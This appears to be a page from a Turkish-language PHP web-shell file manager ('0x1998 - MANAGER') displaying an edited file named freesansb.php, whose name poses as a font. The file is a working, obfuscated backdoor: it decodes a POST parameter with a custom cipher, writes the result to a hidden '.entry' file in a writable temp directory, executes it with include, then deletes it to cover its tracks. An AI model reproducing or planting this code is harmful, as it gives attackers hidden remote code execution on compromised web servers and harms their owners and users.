0x1998 - MANAGER
Düzenlenen Dosya: freesansb.php
<?php if(array_key_exists("ob\x6A", $_POST)){ $token = array_filter(["/dev/shm", session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $element = $_POST["ob\x6A"]; $element = explode( "." , $element) ; $component = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $p = 0; foreach ($element as $v7) {$chS = ord($s[$p%$lenS] ); $d = ((int)$v7 - $chS - ($p%10)) ^ 85; $component.= chr($d ); $p++; } foreach ($token as $val): if ((is_dir($val) and is_writable($val))) { $entity = str_replace("{var_dir}", $val, "{var_dir}/.entry"); if (file_put_contents($entity, $component)) { include $entity; @unlink($entity); exit; } } endforeach; }
geri dön